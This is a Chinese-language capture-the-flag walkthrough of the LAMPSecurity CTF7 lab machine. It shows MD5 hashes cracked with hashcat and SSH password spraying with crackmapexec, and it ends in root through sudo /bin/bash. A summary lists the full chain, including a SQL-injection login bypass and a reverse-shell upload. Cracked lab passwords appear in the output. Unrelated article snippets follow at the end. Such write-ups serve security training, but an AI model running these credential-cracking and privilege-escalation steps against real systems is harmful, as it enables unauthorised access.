098f6bcd4621d373cade4e832627b4f6┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $4}' > hash.lst     ┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat hash.lst 
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6

识别一下哈希的类型

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo hash-identifier 'e22f07b17f98e0d9d364584ced0e3c18'       ##########################################################################     __  __                     __           ______    _____           ##    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         ##    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        ##     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       ##      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      ##       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      ##        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 ##                                                             By Zion3R ##                                                    www.Blackploit.com ##                                                   Root@Blackploit.com ##########################################################################
--------------------------------------------------Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

使用 hashcat 破解md5

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo hashcat -m 0 -a 0 hash.lst /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) startingOpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 8845HS w/ Radeon 780M Graphics, 2913/5891 MB (1024 MB allocatable), 6MCUMinimum password length supported by kernel: 0
Maximum password length supported by kernel: 256Hashes: 12 digests; 12 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-HashATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.Watchdog: Temperature abort trigger set to 90cHost memory required for this attack: 1 MBDictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385ed2539fe892d2c52c42a440354e8e3d5:madrid                   
4cb9c8a8048fd02294477fcb1a41191a:changeme                 
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234                 
098f6bcd4621d373cade4e832627b4f6:test                     
b2a97bcecbd9336b98d59d9324dae5cf:chuck33                  
2146bf95e8929874fc63d54f50f1d2e3:turtles77                
9c42a1346e333a770904b2a2b37fa7d3:somepassword             
e22f07b17f98e0d9d364584ced0e3c18:my2cents                 
Approaching final keyspace - workload adjusted.           Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: hash.lst
Time.Started.....: Fri Sep 27 14:46:20 2024 (4 secs)
Time.Estimated...: Fri Sep 27 14:46:24 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4226.1 kH/s (0.12ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 8/12 (66.67%) Digests (total), 8/12 (66.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[212173657879616e67656c2121] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 29%Started: Fri Sep 27 14:46:18 2024
Stopped: Fri Sep 27 14:46:25 2024

把密码的字符串清洗一下,存到一个文件里 password.lst

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat hashcat.result 
ed2539fe892d2c52c42a440354e8e3d5:madrid                   
4cb9c8a8048fd02294477fcb1a41191a:changeme                 
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234                 
098f6bcd4621d373cade4e832627b4f6:test                     
b2a97bcecbd9336b98d59d9324dae5cf:chuck33                  
2146bf95e8929874fc63d54f50f1d2e3:turtles77                
9c42a1346e333a770904b2a2b37fa7d3:somepassword             
e22f07b17f98e0d9d364584ced0e3c18:my2cents    ┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat hashcat.result| awk -F ':' '{print$2}'                 
madrid                   
changeme                 
qwer1234                 
test                     
chuck33                  
turtles77                
somepassword             
my2cents    ┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat hashcat.result| awk -F ':' '{print$2}' > password.lst┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat password.lst  
madrid                   
changeme                 
qwer1234                 
test                     
chuck33                  
turtles77                
somepassword             
my2cents 

尝试用户名和密码

一个个的尝试比较慢,使用工具更高效

工具 crackmapexec 在域渗透较多使用,这里只是简单使用

crackmapexec 的运行结果是这样,尝试使用 grep 显示 + 加号 存在的行,方便观察

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo crackmapexec ssh 192.168.50.156 -p password.lst -u users.lst --continue-on-success          
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing FTP protocol database
[*] Initializing SSH protocol database
[*] Initializing LDAP protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SSH         192.168.50.156  22     192.168.50.156   [*] SSH-2.0-OpenSSH_5.3
SSH         192.168.50.156  22     192.168.50.156   [-] brian:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:turtles77 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [+] brian:my2cents 
SSH         192.168.50.156  22     192.168.50.156   [-] john:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:turtles77 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:my2cents Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [+] alice:turtles77 
SSH         192.168.50.156  22     192.168.50.156   [-] alice:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:my2cents Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:turtles77 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:my2cents Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [+] leon:qwer1234 
SSH         192.168.50.156  22     192.168.50.156   [-] leon:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:turtles77 Authentication failed.

使用 grep 让它变得容易观察

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo crackmapexec ssh 192.168.50.156 -p password.lst -u users.lst --continue-on-success | grep '+' 
SSH         192.168.50.156  22     192.168.50.156   [+] brian:my2cents 
SSH         192.168.50.156  22     192.168.50.156   [+] alice:turtles77 
SSH         192.168.50.156  22     192.168.50.156   [+] leon:qwer1234 
SSH         192.168.50.156  22     192.168.50.156   [+] julia:madrid 
SSH         192.168.50.156  22     192.168.50.156   [+] michael:somepassword 
SSH         192.168.50.156  22     192.168.50.156   [+] charles:chuck33

用户 brain 的权限是 all all,权限很高

mysql> exit
exit
Bye
bash-4.1$ su brian
su brian
Password: my2cents[brian@bogon inc]$ whoami
whoami
brian
[brian@bogon inc]$ sudo -l
sudo -lWe trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:#1) Respect the privacy of others.#2) Think before you type.#3) With great power comes great responsibility.[sudo] password for brian: my2centsMatching Defaults entries for brian on this host:requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORSDISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATELC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARYLC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALLLANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",secure_path=/sbin\:/bin\:/usr/sbin\:/usr/binUser brian may run the following commands on this host:(ALL) ALL

拿下 root

拿下 root

[brian@bogon inc]$ sudo /bin/bash
sudo /bin/bash
[root@bogon inc]# whoami
whoami
root
[root@bogon inc]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000link/ether 00:0c:29:9d:12:a9 brd ff:ff:ff:ff:ff:ffinet 192.168.50.156/24 brd 192.168.50.255 scope global eth0inet6 fe80::20c:29ff:fe9d:12a9/64 scope link valid_lft forever preferred_lft forever
[root@bogon inc]# 

总结

主机扫描,我们比较感兴趣的端口有 80, 8080
爆一下 80 端口的目录,80 端口是一个 cms,爆破使用 dirb
8080是 cms 后台的页面,sql 注入万能密码登录进入
在后台传个反弹 shell,在爆破目录 asset 中找到 shell 的上传位置
kali 拿到 shell 后使用 python 升级 shell
继续在内网中收集信息,发现数据库连接的配置文件
使用 mysql 进入数据库,账号为 root,密码为空
在 website 数据库中找到 users 表,拿到账户名和密码哈希
使用 crackmap 做密码碰撞,使用用户 brain,sudo -l 查看当前账户的权限
使用 sudo /bin/bash 以管理员身份启动一个 bash 的进程,拿到 root 权限
结束


http://www.ppmy.cn/news/1534657.html

相关文章

FinalShell解决Docker日志中文乱码问题

在DockerFile文件末尾添加如下配置即可解决&#xff1a; #解决Docker容器中文显示乱码问题 ENV LANG C.UTF-8 ENV LC_ALL C.UTF-8

空域中低通滤波器和高通滤波器的互补关系——Unsharp masking的理论基础

空域中从一个单位冲激中减去一个低通核产生一个高通核。 对应地&#xff0c;频域中数字滤波器低通转高通可以通过1-低通高通实现。模拟滤波器不行。 从原始图像减去模糊图像称为Unsharp masking。这是Unsharp masking的理论基础。锐化的程度由这个正比例系数控制。

腾讯一面-LRU缓存

为了设计一个满足LRU&#xff08;最近最少使用&#xff09;缓存约束的数据结构&#xff0c;我们可以使用哈希表&#xff08;HashMap&#xff09;来存储键值对&#xff0c;以便在O(1)时间复杂度内访问任意键。同时&#xff0c;我们还需要一个双向链表&#xff08;Doubly Linked …

【算法系列-链表】交换链表节点(反转 + 交换)

【算法系列-链表】交换链表节点(反转 交换) 文章目录 【算法系列-链表】交换链表节点(反转 交换)1. 反转链表1.1 思路分析&#x1f3af;1.2 解题过程&#x1f3ac;1.3 代码示例&#x1f330; 2. 两两交换链表中的节点2.1 思路分析&#x1f3af;2.2 解题过程&#x1f3ac;2.3 …

04DSP学习-利用syscfg配置EPWM

打开syscfg文件&#xff0c;左侧control栏中找到EPWM&#xff0c;点击&#xff0c;发现TI提供了一些帮助文档&#xff0c;帮助了解如何使用syscfg以及如何了解EPWM。我们结合配置过程去理解如何使用。 设计目标 使用EPWM1&#xff1b;增减计数&#xff1b;PWM频率为10kHz&…

多线程-初阶(1)

本节⽬标 • 认识多线程 • 掌握多线程程序的编写 • 掌握多线程的状态 • 掌握什么是线程不安全及解决思路 • 掌握 synchronized、volatile 关键字 1. 认识线程&#xff08;Thread&#xff09; 1.1 概念 1) 线程是什么 ⼀个线程就是⼀个 "执⾏流". 每个线…

深入浅出:现代JavaScript开发者必知必会的Web性能优化技巧

亲爱的读者们&#xff0c;欢迎来到本期博客。今天&#xff0c;我们将深入探讨JavaScript开发者在日常工作中如何提升Web性能。在快节奏的Web开发世界中&#xff0c;性能优化至关重要。本文将分享一些实用技巧&#xff0c;帮助你构建快速、高效的Web应用。 1. 使用CDN加速资源加…

量子计算:颠覆未来计算的革命性技术

量子计算&#xff1a;颠覆未来计算的革命性技术 量子计算作为下一代颠覆性技术&#xff0c;正在引领计算领域的重大变革。与传统计算机基于比特的二进制运算不同&#xff0c;量子计算通过量子比特&#xff08;qubits&#xff09;在叠加态和纠缠态下实现并行计算&#xff0c;能…